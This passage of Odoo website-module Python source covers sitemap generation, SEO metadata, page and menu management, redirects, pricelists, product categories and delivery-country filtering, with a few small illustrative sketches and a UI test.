func = rule.endpoint.routing['sitemap']
if func is False:
continue
for loc in func(self.env, rule, query_string):
yield loc
continue
if not self.rule_is_enumerable(rule):
continue
converters = rule._converters or {}
if query_string and not converters and (query_string not in rule.build([{}], append_unknown=False)[1]):
continue
values = [{}]
# converters with a domain are processed after the other ones
convitems = sorted(
converters.items(),
key=lambda x: (hasattr(x[1], 'domain') and (x[1].domain != '[]'), rule._trace.index((True, x[0]))))
for (i, (name, converter)) in enumerate(convitems):
newval = []
for val in values:
query = i == len(convitems) - 1 and query_string
if query:
r = "".join([x[1] for x in rule._trace[1:] if not x[0]]) # remove model converter from route
query = sitemap_qs2dom(query, r, self.env[converter.model]._rec_name)
if query == FALSE_DOMAIN:
continue
for value_dict in converter.generate(uid=self.env.uid, dom=query, args=val):
newval.append(val.copy())
value_dict[name] = value_dict['loc']
del value_dict['loc']
newval[-1].update(value_dict)
values = newval
for value in values:
domain_part, url = rule.build(value, append_unknown=False)
if not query_string or query_string.lower() in url.lower():
page = {'loc': url}
if url in ('/sitemap.xml',):
continue
if url in url_set:
continue
url_set.add(url)
yield page
# '/' already has a http.route & is in the routing_map so it will already have an entry in the xml
domain = [('url', '!=', '/')]
if not force:
domain += [('website_indexed', '=', True)]
# is_visible
domain += [('website_published', '=', True), '|', ('date_publish', '=', False), ('date_publish', '<=', fields.Datetime.now())]
if query_string:
domain += [('url', 'like', query_string)]
pages = self.get_website_pages(domain)
for page in pages:
record = {'loc': page['url'], 'id': page['id'], 'name': page['name']}
if page.view_id and page.view_id.priority != 16:
record['priority'] = min(round(page.view_id.priority / 32.0, 1), 1)
if page['write_date']:
record['lastmod'] = page['write_date'].date()
yield record
@api.multi
def get_website_pages(self, domain=None, order='name', limit=None):
# avoid mutating a shared default list and honor the requested order
domain = (domain or []) + self.get_current_website().website_domain()
pages = self.env['website.page'].search(domain, order=order, limit=limit)
return pages
@api.multi
def search_pages(self, needle=None, limit=None):
name = slugify(needle, max_length=50, path=True)
res = []
for page in self.enumerate_pages(query_string=name, force=True):
res.append(page)
if len(res) == limit:
break
return res
@api.model
def image_url(self, record, field, size=None):
""" Returns a local url that points to the image field of a given browse record. """
sudo_record = record.sudo()
sha = hashlib.sha1(str(getattr(sudo_record, '__last_update')).encode('utf-8')).hexdigest()[0:7]
size = '' if size is None else '/%s' % size
return '/web/image/%s/%s/%s%s?unique=%s' % (record._name, record.id, field, size, sha)
def get_cdn_url(self, uri):
self.ensure_one()
if not uri:
return ''
cdn_url = self.cdn_url
cdn_filters = (self.cdn_filters or '').splitlines()
for flt in cdn_filters:
if flt and re.match(flt, uri):
return urls.url_join(cdn_url, uri)
return uri
@api.model
def action_dashboard_redirect(self):
if self.env.user.has_group('base.group_system') or self.env.user.has_group('website.group_website_designer'):
return self.env.ref('website.backend_dashboard').read()[0]
return self.env.ref('website.action_website').read()[0]
def button_go_website(self):
self._force()
return {
'type': 'ir.actions.act_url',
'url': '/',
'target': 'self',
}
@api.multi
def _get_http_domain(self):
"""Get the domain of the current website, prefixed by http if no
scheme is specified.
Empty string if no domain is specified on the website.
"""
self.ensure_one()
if not self.domain:
return ''
res = urls.url_parse(self.domain)
return 'http://' + self.domain if not res.scheme else self.domain
class SeoMetadata(models.AbstractModel):
_name = 'website.seo.metadata'
_description = 'SEO metadata'
is_seo_optimized = fields.Boolean("SEO optimized", compute='_compute_is_seo_optimized')
website_meta_title = fields.Char("Website meta title", translate=True)
website_meta_description = fields.Text("Website meta description", translate=True)
website_meta_keywords = fields.Char("Website meta keywords", translate=True)
website_meta_og_img = fields.Char("Website opengraph image")
@api.multi
def _compute_is_seo_optimized(self):
for record in self:
record.is_seo_optimized = record.website_meta_title and record.website_meta_description and record.website_meta_keywords
def _default_website_meta(self):
""" This method will return default meta information. It return the dict
contains meta property as a key and meta content as a value.
e.g. 'og:type': 'website'.
Override this method in case you want to change default value
from any model. e.g. change value of og:image to product specific
images instead of default images
"""
self.ensure_one()
company = request.website.company_id.sudo()
title = (request.website or company).name
if 'name' in self:
title = '%s | %s' % (self.name, title)
if request.website.social_default_image:
img = '/web/image/website/%s/social_default_image' % request.website.id
else:
img = '/web/image/res.company/%s/logo' % company.id
# Default meta for OpenGraph
default_opengraph = {
'og:type': 'website',
'og:title': title,
'og:site_name': company.name,
'og:url': request.httprequest.url,
'og:image': img,
}
# Default meta for Twitter
default_twitter = {
'twitter:card': 'summary_large_image',
'twitter:title': title,
'twitter:image': img + '/300x300',
}
if company.social_twitter:
default_twitter['twitter:site'] = "@%s" % company.social_twitter.split('/')[-1]
return {
'default_opengraph': default_opengraph,
'default_twitter': default_twitter
}
def get_website_meta(self):
""" This method will return final meta information. It will replace
default values with user's custom value (if user modified it from
the seo popup of fronted)
This method is not meant for overridden. To customize meta values
override `_default_website_meta` method instead of this method. This
method only replaces user custom values in defaults.
"""
root_url = request.httprequest.url_root.strip('/')
default_meta = self._default_website_meta()
opengraph_meta, twitter_meta = default_meta['default_opengraph'], default_meta['default_twitter']
if self.website_meta_title:
opengraph_meta['og:title'] = self.website_meta_title
twitter_meta['twitter:title'] = self.website_meta_title
if self.website_meta_description:
opengraph_meta['og:description'] = self.website_meta_description
twitter_meta['twitter:description'] = self.website_meta_description
meta_image = self.website_meta_og_img or opengraph_meta['og:image']
if meta_image.startswith('/'):
meta_image = "%s%s" % (root_url, meta_image)
opengraph_meta['og:image'] = meta_image
twitter_meta['twitter:image'] = meta_image
return {
'opengraph_meta': opengraph_meta,
'twitter_meta': twitter_meta
}
class WebsiteMultiMixin(models.AbstractModel):
_name = 'website.multi.mixin'
_description = 'Multi Website Mixin'
website_id = fields.Many2one('website', string='Website', ondelete='restrict', help='Restrict publishing to this website.')
@api.multi
def can_access_from_current_website(self, website_id=False):
can_access = True
for record in self:
if (website_id or record.website_id.id) not in (False, request.website.id):
can_access = False
continue
return can_access
class WebsitePublishedMixin(models.AbstractModel):
_name = "website.published.mixin"
_description = 'Website Published Mixin'
website_published = fields.Boolean('Visible on current website', related='is_published', readonly=False)
is_published = fields.Boolean('Is published', copy=False)
website_url = fields.Char('Website URL', compute='_compute_website_url', help='The full URL to access the document through the website.')
@api.multi
def _compute_website_url(self):
for record in self:
record.website_url = '#'
@api.multi
def website_publish_button(self):
self.ensure_one()
if self.env.user.has_group('website.group_website_publisher') and self.website_url != '#':
# Force website to land on record's website to publish/unpublish it
if 'website_id' in self and self.env.user.has_group('website.group_multi_website'):
self.website_id._force()
return self.open_website_url()
return self.write({'website_published': not self.website_published})
def open_website_url(self):
return {
'type': 'ir.actions.act_url',
'url': self.website_url,
'target': 'self',
}
def create_and_get_website_url(self, **kwargs):
return self.create(kwargs).website_url
class WebsitePublishedMultiMixin(WebsitePublishedMixin):
_name = 'website.published.multi.mixin'
_inherit = ['website.published.mixin', 'website.multi.mixin']
_description = 'Multi Website Published Mixin'
website_published = fields.Boolean(compute='_compute_website_published',
inverse='_inverse_website_published',
search='_search_website_published',
related=False, readonly=False)
@api.multi
@api.depends('is_published', 'website_id')
def _compute_website_published(self):
current_website_id = self._context.get('website_id')
for record in self:
if current_website_id:
record.website_published = record.is_published and (not record.website_id or record.website_id.id == current_website_id)
else:
record.website_published = record.is_published
@api.multi
def _inverse_website_published(self):
for record in self:
record.is_published = record.website_published
def _search_website_published(self, operator, value):
if not isinstance(value, bool) or operator not in ('=', '!='):
logger.warning('unsupported search on website_published: %s, %s', operator, value)
return [()]
if operator in expression.NEGATIVE_TERM_OPERATORS:
value = not value
current_website_id = self._context.get('website_id')
is_published = [('is_published', '=', value)]
if current_website_id:
on_current_website = self.env['website'].website_domain(current_website_id)
return (['!'] if value is False else []) + expression.AND([is_published, on_current_website])
else: # should be in the backend, return things that are published anywhere
return is_published
class Page(models.Model):
_name = 'website.page'
_inherits = {'ir.ui.view': 'view_id'}
_inherit = 'website.published.multi.mixin'
_description = 'Page'
_order = 'website_id'
url = fields.Char('Page URL')
view_id = fields.Many2one('ir.ui.view', string='View', required=True, ondelete="cascade")
website_indexed = fields.Boolean('Page Indexed', default=True)
date_publish = fields.Datetime('Publishing Date')
# This is needed to be able to display whether a page is a menu in /website/pages
menu_ids = fields.One2many('website.menu', 'page_id', 'Related Menus')
is_homepage = fields.Boolean(compute='_compute_homepage', inverse='_set_homepage', string='Homepage')
is_visible = fields.Boolean(compute='_compute_visible', string='Is Visible')
# Page options
header_overlay = fields.Boolean()
header_color = fields.Char()
# don't use mixin website_id but use website_id on ir.ui.view instead
website_id = fields.Many2one(related='view_id.website_id', store=True, readonly=False)
@api.one
def _compute_homepage(self):
self.is_homepage = self == self.env['website'].get_current_website().homepage_id
@api.one
def _set_homepage(self):
website = self.env['website'].get_current_website()
if self.is_homepage:
if website.homepage_id != self:
website.write({'homepage_id': self.id})
else:
if website.homepage_id == self:
website.write({'homepage_id': None})
@api.one
def _compute_visible(self):
self.is_visible = self.website_published and (not self.date_publish or self.date_publish < fields.Datetime.now())
@api.multi
def _is_most_specific_page(self, page_to_test):
'''This will test if page_to_test is the most specific page in self.'''
pages_for_url = self.sorted(key=lambda p: not p.website_id).filtered(lambda page: page.url == page_to_test.url)
# this works because pages are _order'ed by website_id
most_specific_page = pages_for_url[0]
return most_specific_page == page_to_test
@api.model
def get_page_info(self, id):
return self.browse(id).read(
['id', 'name', 'url', 'website_published', 'website_indexed', 'date_publish', 'menu_ids', 'is_homepage', 'website_id'],
)
@api.multi
def get_view_identifier(self):
""" Get identifier of this page view that may be used to render it """
return self.view_id.id
@api.model
def save_page_info(self, website_id, data):
website = self.env['website'].browse(website_id)
page = self.browse(int(data['id']))
# If URL has been edited, slug it
original_url = page.url
url = data['url']
if not url.startswith('/'):
url = '/' + url
if page.url != url:
url = '/' + slugify(url, max_length=1024, path=True)
url = self.env['website'].get_unique_path(url)
# If name has changed, check for key uniqueness
if page.name != data['name']:
page_key = self.env['website'].get_unique_key(slugify(data['name']))
else:
page_key = page.key
menu = self.env['website.menu'].search([('page_id', '=', int(data['id']))])
if not data['is_menu']:
# If the page is no longer in menu, we should remove its website_menu
if menu:
menu.unlink()
else:
# The page is now a menu, check if it already has one
if menu:
menu.write({'url': url})
else:
self.env['website.menu'].create({
'name': data['name'],
'url': url,
'page_id': data['id'],
'parent_id': website.menu_id.id,
'website_id': website.id,
})
# Edits via the page manager shouldn't trigger the COW
# mechanism and generate new pages. The user manages page
# visibility manually with is_published here.
w_vals = {
'key': page_key,
'name': data['name'],
'url': url,
'is_published': data['website_published'],
'website_indexed': data['website_indexed'],
'date_publish': data['date_publish'] or None,
'is_homepage': data['is_homepage'],
}
page.with_context(no_cow=True).write(w_vals)
# Create redirect if needed
if data['create_redirect']:
self.env['website.redirect'].create({
'type': data['redirect_type'],
'url_from': original_url,
'url_to': url,
'website_id': website.id,
})
return url
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
if default:
if not default.get('view_id'):
view = self.env['ir.ui.view'].browse(self.view_id.id)
new_view = view.copy({'website_id': default.get('website_id')})
default['view_id'] = new_view.id
default['url'] = default.get('url', self.env['website'].get_unique_path(self.url))
return super(Page, self).copy(default=default)
@api.model
def clone_page(self, page_id, clone_menu=True):
""" Clone a page, given its identifier
:param page_id : website.page identifier
"""
page = self.browse(int(page_id))
new_page = page.copy(dict(name=page.name, website_id=self.env['website'].get_current_website().id))
# Should not clone menu if the page was cloned from one website to another
# E.g. cloning a generic page (no website) will create a page with a website; we can't clone the menu (not the same container)
if clone_menu and new_page.website_id == page.website_id:
menu = self.env['website.menu'].search([('page_id', '=', page_id)], limit=1)
if menu:
# If the page being cloned has a menu, clone it too
menu.copy({'url': new_page.url, 'name': menu.name, 'page_id': new_page.id})
return new_page.url + '?enable_editor=1'
@api.multi
def unlink(self):
# When a website_page is deleted, the ORM does not delete its
# ir_ui_view. So we have to delete it ourselves, but only if the
# ir_ui_view is not used by another website_page.
for page in self:
# Other pages linked to the ir_ui_view of the page being deleted (will it even be possible?)
pages_linked_to_iruiview = self.search(
[('view_id', '=', page.view_id.id), ('id', '!=', page.id)]
)
if not pages_linked_to_iruiview and not page.view_id.inherit_children_ids:
# If there is no other pages linked to that ir_ui_view, we can delete the ir_ui_view
page.view_id.unlink()
return super(Page, self).unlink()
@api.multi
def write(self, vals):
if 'url' in vals and not vals['url'].startswith('/'):
vals['url'] = '/' + vals['url']
return super(Page, self).write(vals)
def get_website_meta(self):
self.ensure_one()
return self.view_id.get_website_meta()
class Menu(models.Model):
_name = "website.menu"
_description = "Website Menu"
_parent_store = True
_order = "sequence, id"
def _default_sequence(self):
menu = self.search([], limit=1, order="sequence DESC")
return menu.sequence or 0
name = fields.Char('Menu', required=True, translate=True)
url = fields.Char('Url', default='')
page_id = fields.Many2one('website.page', 'Related Page', ondelete='cascade')
new_window = fields.Boolean('New Window')
sequence = fields.Integer(default=_default_sequence)
website_id = fields.Many2one('website', 'Website', ondelete='cascade')
parent_id = fields.Many2one('website.menu', 'Parent Menu', index=True, ondelete="cascade")
child_id = fields.One2many('website.menu', 'parent_id', string='Child Menus')
parent_path = fields.Char(index=True)
is_visible = fields.Boolean(compute='_compute_visible', string='Is Visible')
@api.multi
def name_get(self):
res = []
for menu in self:
website_suffix = '%s - %s' % (menu.name, menu.website_id.name)
res.append((menu.id, website_suffix if menu.website_id and self.env.user.has_group('website.group_multi_website') else menu.name))
return res
@api.model
def create(self, vals):
''' In case a menu without a website_id is being created, we duplicate
it for every website.
Note: particularly useful when installing a module that adds a menu like
/shop, so that every website gets the shop menu.
Be careful to return the correct record for the ir.model.data xml_id in case
of default main menu creation.
'''
# Only used when creating website_data.xml default menu
if vals.get('url') == '/default-main-menu':
return super(Menu, self).create(vals)
if 'website_id' in vals:
return super(Menu, self).create(vals)
elif self._context.get('website_id'):
vals['website_id'] = self._context.get('website_id')
return super(Menu, self).create(vals)
else:
# create for every site
for website in self.env['website'].search([]):
w_vals = dict(vals, **{
'website_id': website.id,
'parent_id': website.menu_id.id,
})
res = super(Menu, self).create(w_vals)
# if creating a default menu, we should also save it as such
default_menu = self.env.ref('website.main_menu', raise_if_not_found=False)
if default_menu and vals.get('parent_id') == default_menu.id:
res = super(Menu, self).create(vals)
return res # Only one record is returned but multiple could have been created
@api.multi
def unlink(self):
default_menu = self.env.ref('website.main_menu', raise_if_not_found=False)
menus_to_remove = self
for menu in self.filtered(lambda m: default_menu and m.parent_id.id == default_menu.id):
menus_to_remove |= self.env['website.menu'].search([('url', '=', menu.url),
('website_id', '!=', False),
('id', '!=', menu.id)])
return super(Menu, menus_to_remove).unlink()
@api.one
def _compute_visible(self):
visible = True
if self.page_id and not self.page_id.sudo().is_visible and not self.user_has_groups('base.group_user'):
visible = False
self.is_visible = visible
@api.model
def clean_url(self):
# clean the url with heuristic
if self.page_id:
url = self.page_id.sudo().url
else:
url = self.url
if url and not self.url.startswith('/'):
if '@' in self.url:
if not self.url.startswith('mailto'):
url = 'mailto:%s' % self.url
elif not self.url.startswith('http'):
url = '/%s' % self.url
return url
# would be better to take a menu_id as argument
@api.model
def get_tree(self, website_id, menu_id=None):
def make_tree(node):
page_id = node.page_id.id if node.page_id else None
is_homepage = page_id and self.env['website'].browse(website_id).homepage_id.id == page_id
menu_node = dict(
id=node.id,
name=node.name,
url=node.page_id.url if page_id else node.url,
new_window=node.new_window,
sequence=node.sequence,
parent_id=node.parent_id.id,
children=[],
is_homepage=is_homepage,
)
for child in node.child_id:
menu_node['children'].append(make_tree(child))
return menu_node
if menu_id:
menu = self.browse(menu_id)
else:
menu = self.env['website'].browse(website_id).menu_id
return make_tree(menu)
@api.model
def save(self, website_id, data):
def replace_id(old_id, new_id):
for menu in data['data']:
if menu['id'] == old_id:
menu['id'] = new_id
if menu['parent_id'] == old_id:
menu['parent_id'] = new_id
to_delete = data['to_delete']
if to_delete:
self.browse(to_delete).unlink()
for menu in data['data']:
mid = menu['id']
# new menus are prefixed by new-
if isinstance(mid, pycompat.string_types):
new_menu = self.create({'name': menu['name'], 'website_id': website_id})
replace_id(mid, new_menu.id)
for menu in data['data']:
menu_id = self.browse(menu['id'])
# if the url matches a website.page, set the m2o relation
# except if the menu url is '#', meaning it will be used as a menu container, most likely for a dropdown
if menu['url'] == '#':
if menu_id.page_id:
menu_id.page_id = None
else:
page = self.env['website.page'].search(self.env["website"].website_domain(website_id) + ['|', ('url', '=', menu['url']), ('url', '=', '/' + menu['url'])], limit=1)
if page:
menu['page_id'] = page.id
menu['url'] = page.url
elif menu_id.page_id:
menu_id.page_id.write({'url': menu['url']})
menu_id.write(menu)
return True
class WebsiteRedirect(models.Model):
_name = "website.redirect"
_description = "Website Redirect"
_order = "sequence, id"
_rec_name = 'url_from'
type = fields.Selection([('301', 'Moved permanently (301)'), ('302', 'Moved temporarily (302)')], string='Redirection Type', required=True, default='301')
url_from = fields.Char('Redirect From', required=True)
url_to = fields.Char('Redirect To', required=True)
website_id = fields.Many2one('website', 'Website', ondelete='cascade')
active = fields.Boolean(default=True)
sequence = fields.Integer()
```
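The domain matching described in `_get_current_website_id` above (exact `netloc` match, retry ignoring the port, then country filter, then fallback) is easier to follow outside the ORM. The sketch below reproduces those steps on plain dicts, using `urllib.parse` instead of `werkzeug.urls`; the helper names and the sample websites are illustrative only, not part of the module.

```python
from urllib.parse import urlsplit

def _remove_port(domain):
    return (domain or '').split(':')[0]

def _netloc(domain):
    # urlsplit only returns a netloc when a scheme is present, so add one if missing.
    return urlsplit(domain if '//' in domain else 'http://' + domain).netloc

def pick_website(websites, domain_name, country_id=None, fallback=True):
    """websites: list of {'id', 'domain', 'country_ids'} dicts, generic ones first."""
    # 1. exact host:port match, then retry while ignoring the port
    exact = [w for w in websites if _netloc(w['domain']).lower() == (domain_name or '').lower()]
    found = exact or [w for w in websites
                      if _remove_port(_netloc(w['domain'])).lower() == _remove_port(domain_name).lower()]
    if not found:
        return websites[0]['id'] if (fallback and websites) else False
    if len(found) == 1:
        return found[0]['id']
    # 2. several websites share the domain: prefer the one matching the visitor's country
    by_country = [w for w in found if country_id in w['country_ids']]
    return (by_country or found)[0]['id']

sites = [
    {'id': 1, 'domain': 'https://example.com', 'country_ids': []},
    {'id': 2, 'domain': 'example.com', 'country_ids': [21]},
]
assert pick_website(sites, 'example.com', country_id=21) == 2   # country-specific website wins
assert pick_website(sites, 'example.com:8069') == 1             # port ignored, generic website first
assert pick_website(sites, 'other.org') == 1                    # no match at all: fallback
```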
#### File: website_rating/controllers/website_mail.py
```python
from odoo import http
from odoo.http import request
from odoo.addons.portal.controllers.mail import PortalChatter
class WebsiteRating(PortalChatter):
@http.route()
def portal_chatter_init(self, res_model, res_id, domain=False, limit=False, **kwargs):
result = super(WebsiteRating, self).portal_chatter_init(res_model, res_id, domain=domain, limit=limit, **kwargs)
# get the rating statistics about the record
if kwargs.get('rating_include'):
record = request.env[res_model].browse(res_id)
if hasattr(record, 'rating_get_stats'):
result['rating_stats'] = record.rating_get_stats([('website_published', '=', True)])
return result
@http.route()
def portal_message_fetch(self, res_model, res_id, domain=False, limit=False, offset=False, **kw):
# add 'rating_include' in context, to fetch them in portal_message_format
if kw.get('rating_include'):
context = dict(request.context)
context['rating_include'] = True
request.context = context
return super(WebsiteRating, self).portal_message_fetch(res_model, res_id, domain=domain, limit=limit, offset=offset, **kw)
```
#### File: website_sale_comparison/models/website_sale_comparison.py
```python
from collections import OrderedDict
from odoo import fields, models, _
class ProductAttributeCategory(models.Model):
_name = "product.attribute.category"
_description = "Product Attribute Category"
_order = 'sequence'
name = fields.Char("Category Name", required=True, translate=True)
sequence = fields.Integer("Sequence", default=10)
class ProductAttribute(models.Model):
_inherit = 'product.attribute'
category_id = fields.Many2one('product.attribute.category', string="Category",
help="Set a category to regroup similar attributes under "
"the same section in the Comparison page of eCommerce")
class ProductTemplate(models.Model):
_inherit = 'product.template'
def get_variant_groups(self):
res = OrderedDict()
for var in self._get_valid_product_template_attribute_lines():
res.setdefault(var.attribute_id.category_id.name or _('Uncategorized'), []).append(var)
return res
```
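`get_variant_groups` above is a plain `setdefault` bucketing of attribute lines by the name of their attribute's category, with an "Uncategorized" fallback. A minimal sketch with namedtuple stand-ins for the ORM records (the data is made up) shows the ordered mapping the comparison page iterates over:

```python
from collections import OrderedDict, namedtuple

# Stand-ins for product.template.attribute.line / product.attribute records.
Attribute = namedtuple('Attribute', 'name category')
Line = namedtuple('Line', 'attribute_id')

lines = [
    Line(Attribute('Color', 'Aesthetics')),
    Line(Attribute('Memory', 'Hardware')),
    Line(Attribute('Legs', None)),           # no category -> "Uncategorized"
    Line(Attribute('Finish', 'Aesthetics')),
]

groups = OrderedDict()
for line in lines:
    groups.setdefault(line.attribute_id.category or 'Uncategorized', []).append(line)

assert list(groups) == ['Aesthetics', 'Hardware', 'Uncategorized']
assert [l.attribute_id.name for l in groups['Aesthetics']] == ['Color', 'Finish']
```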
#### File: website_sale_delivery/models/res_country.py
```python
from odoo import fields, models
class ResCountry(models.Model):
_inherit = 'res.country'
def get_website_sale_countries(self, mode='billing'):
res = super(ResCountry, self).get_website_sale_countries(mode=mode)
if mode == 'shipping':
countries = self.env['res.country']
delivery_carriers = self.env['delivery.carrier'].sudo().search([('website_published', '=', True)])
for carrier in delivery_carriers:
if not carrier.country_ids and not carrier.state_ids:
countries = res
break
countries |= carrier.country_ids
res = res & countries
return res
def get_website_sale_states(self, mode='billing'):
res = super(ResCountry, self).get_website_sale_states(mode=mode)
states = self.env['res.country.state']
if mode == 'shipping':
dom = ['|', ('country_ids', 'in', self.id), ('country_ids', '=', False), ('website_published', '=', True)]
delivery_carriers = self.env['delivery.carrier'].sudo().search(dom)
for carrier in delivery_carriers:
if not carrier.country_ids and not carrier.state_ids:
states = res
break
states |= carrier.state_ids
if not states:
states = states.search([('country_id', '=', self.id)])
res = res & states
return res
```
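The shipping-country restriction in `get_website_sale_countries` reduces to set algebra: union the countries of every published carrier, short-circuiting to "no filtering" as soon as one carrier has no country/state restriction, then intersect with the billing list. A standalone sketch with plain sets and made-up country codes:

```python
def shipping_countries(base_countries, carriers):
    """base_countries: countries allowed for billing.
    carriers: one set of country codes per published carrier; an empty set
    stands for a carrier with no country/state restriction at all."""
    allowed = set()
    for carrier_countries in carriers:
        if not carrier_countries:   # unrestricted carrier -> keep the billing list as-is
            return base_countries
        allowed |= carrier_countries
    return base_countries & allowed

assert shipping_countries({'BE', 'FR', 'US'}, [{'BE'}, {'FR', 'DE'}]) == {'BE', 'FR'}
assert shipping_countries({'BE', 'FR', 'US'}, [{'BE'}, set()]) == {'BE', 'FR', 'US'}
```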
#### File: website_sale_delivery/tests/test_ui.py
```python
import odoo.tests
# Part of Odoo. See LICENSE file for full copyright and licensing details.
@odoo.tests.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_free_delivery_when_exceed_threshold(self):
self.env.ref("delivery.free_delivery_carrier").write({
'fixed_price': 2,
'free_over': True,
'amount': 10,
})
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('check_free_delivery')", "odoo.__DEBUG__.services['web_tour.tour'].tours.check_free_delivery.ready", login="admin")
```
#### File: website_sale/models/product.py
```python
from odoo import api, fields, models, tools, _
from odoo.addons import decimal_precision as dp
from odoo.addons.website.models import ir_http
from odoo.tools.translate import html_translate
class ProductStyle(models.Model):
_name = "product.style"
_description = 'Product Style'
name = fields.Char(string='Style Name', required=True)
html_class = fields.Char(string='HTML Classes')
class ProductPricelist(models.Model):
_inherit = "product.pricelist"
def _default_website(self):
""" Find the first company's website, if there is one. """
company_id = self.env.user.company_id.id
domain = [('company_id', '=', company_id)]
return self.env['website'].search(domain, limit=1)
website_id = fields.Many2one('website', string="Website", ondelete='restrict', default=_default_website)
code = fields.Char(string='E-commerce Promotional Code', groups="base.group_user")
selectable = fields.Boolean(help="Allow the end user to choose this price list")
def clear_cache(self):
# website._get_pl_partner_order() is cached to avoid recomputing the list of
# available pricelists at each request. So we need to invalidate the cache when
# the website pricelist configuration changes, to force a recompute.
website = self.env['website']
website._get_pl_partner_order.clear_cache(website)
@api.model
def create(self, data):
res = super(ProductPricelist, self).create(data)
self.clear_cache()
return res
@api.multi
def write(self, data):
res = super(ProductPricelist, self).write(data)
self.clear_cache()
return res
@api.multi
def unlink(self):
res = super(ProductPricelist, self).unlink()
self.clear_cache()
return res
def _get_partner_pricelist_multi_search_domain_hook(self):
domain = super(ProductPricelist, self)._get_partner_pricelist_multi_search_domain_hook()
website = ir_http.get_request_website()
if website:
domain += self._get_website_pricelists_domain(website.id)
return domain
def _get_partner_pricelist_multi_filter_hook(self):
res = super(ProductPricelist, self)._get_partner_pricelist_multi_filter_hook()
website = ir_http.get_request_website()
if website:
res = res.filtered(lambda pl: pl._is_available_on_website(website.id))
return res
@api.multi
def _is_available_on_website(self, website_id):
""" To be able to be used on a website, a pricelist should either:
- Have its `website_id` set to current website (specific pricelist).
- Have no `website_id` set and should be `selectable` (generic pricelist)
or should have a `code` (generic promotion).
Note: A pricelist without a website_id, not selectable and without a
code is a backend pricelist.
Change in this method should be reflected in `_get_website_pricelists_domain`.
"""
self.ensure_one()
return self.website_id.id == website_id or (not self.website_id and (self.selectable or self.sudo().code))
def _get_website_pricelists_domain(self, website_id):
''' Check above `_is_available_on_website` for explanation.
Change in this method should be reflected in `_is_available_on_website`.
'''
return [
'|', ('website_id', '=', website_id),
'&', ('website_id', '=', False),
'|', ('selectable', '=', True), ('code', '!=', False),
]
def _get_partner_pricelist_multi(self, partner_ids, company_id=None):
''' If `property_product_pricelist` is read from website, we should use
the website's company and not the user's one.
Passing a `company_id` to super will avoid using the current user's
company.
'''
website = ir_http.get_request_website()
if not company_id and website:
company_id = website.company_id.id
return super(ProductPricelist, self)._get_partner_pricelist_multi(partner_ids, company_id)
class ProductPublicCategory(models.Model):
_name = "product.public.category"
_inherit = ["website.seo.metadata", "website.multi.mixin"]
_description = "Website Product Category"
_order = "sequence, name"
name = fields.Char(required=True, translate=True)
parent_id = fields.Many2one('product.public.category', string='Parent Category', index=True)
child_id = fields.One2many('product.public.category', 'parent_id', string='Children Categories')
sequence = fields.Integer(help="Gives the sequence order when displaying a list of product categories.")
# NOTE: there is no 'default image', because by default we don't show
# thumbnails for categories. However if we have a thumbnail for at least one
# category, then we display a default image on the other, so that the
# buttons have consistent styling.
# In this case, the default image is set by the js code.
image = fields.Binary(attachment=True, help="This field holds the image used as image for the category, limited to 1024x1024px.")
image_medium = fields.Binary(string='Medium-sized image', attachment=True,
help="Medium-sized image of the category. It is automatically "
"resized as a 128x128px image, with aspect ratio preserved. "
"Use this field in form views or some kanban views.")
image_small = fields.Binary(string='Small-sized image', attachment=True,
help="Small-sized image of the category. It is automatically "
"resized as a 64x64px image, with aspect ratio preserved. "
"Use this field anywhere a small image is required.")
@api.model
def create(self, vals):
tools.image_resize_images(vals)
return super(ProductPublicCategory, self).create(vals)
@api.multi
def write(self, vals):
tools.image_resize_images(vals)
return super(ProductPublicCategory, self).write(vals)
@api.constrains('parent_id')
def check_parent_id(self):
if not self._check_recursion():
raise ValueError(_('Error ! You cannot create recursive categories.'))
@api.multi
def name_get(self):
res = []
for category in self:
names = [category.name]
parent_category = category.parent_id
while parent_category:
names.append(parent_category.name)
parent_category = parent_category.parent_id
res.append((category.id, ' / '.join(reversed(names))))
return res
class ProductTemplate(models.Model):
_inherit = ["product.template", "website.seo.metadata", 'website.published.multi.mixin', 'rating.mixin']
_name = 'product.template'
_mail_post_access = 'read'
website_description = fields.Html('Description for the website', sanitize_attributes=False, translate=html_translate)
alternative_product_ids = fields.Many2many('product.template', 'product_alternative_rel', 'src_id', 'dest_id',
string='Alternative Products', help='Suggest alternatives to your customer '
'(upsell strategy). Those products show up on the product page.')
accessory_product_ids = fields.Many2many('product.product', 'product_accessory_rel', 'src_id', 'dest_id',
string='Accessory Products', help='Accessories show up when the customer '
'reviews the cart before payment (cross-sell strategy).')
website_size_x = fields.Integer('Size X', default=1)
website_size_y = fields.Integer('Size Y', default=1)
website_style_ids = fields.Many2many('product.style', string='Styles')
website_sequence = fields.Integer('Website Sequence', help="Determine the display order in the Website E-commerce",
default=lambda self: self._default_website_sequence())
public_categ_ids = fields.Many2many('product.public.category', string='Website Product Category',
help="The product will be available in each mentioned e-commerce category. Go to"
"Shop > Customize and enable 'E-commerce categories' to view all e-commerce categories.")
product_image_ids = fields.One2many('product.image', 'product_tmpl_id', string='Images')
# website_price deprecated, directly use _get_combination_info instead
website_price = fields.Float('Website price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_public_price deprecated, directly use _get_combination_info instead
website_public_price = fields.Float('Website public price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_price_difference deprecated, directly use _get_combination_info instead
website_price_difference = fields.Boolean('Website price difference', compute='_website_price')
def _website_price(self):
current_website = self.env['website'].get_current_website()
for template in self.with_context(website_id=current_website.id):
res = template._get_combination_info()
template.website_price = res.get('price')
template.website_public_price = res.get('list_price')
template.website_price_difference = res.get('has_discounted_price')
@api.multi
def _has_no_variant_attributes(self):
"""Return whether this `product.template` has at least one no_variant
attribute.
:return: True if at least one no_variant attribute, False otherwise
:rtype: bool
"""
self.ensure_one()
return any(a.create_variant == 'no_variant' for a in self._get_valid_product_attributes())
@api.multi
def _has_is_custom_values(self):
"""Return whether this `product.template` has at least one is_custom
attribute value.
:return: True if at least one is_custom attribute value, False otherwise
:rtype: bool
"""
self.ensure_one()
return any(v.is_custom for v in self._get_valid_product_attribute_values())
@api.multi
def _is_quick_add_to_cart_possible(self, parent_combination=None):
"""
It's possible to quickly add to cart if there's no optional product,
there's only one possible combination and no value is set to is_custom.
Attributes set to dynamic or no_variant don't have to be tested
specifically because they will be taken into account when checking for
the possible combinations.
:param parent_combination: combination from which `self` is an
optional or accessory product
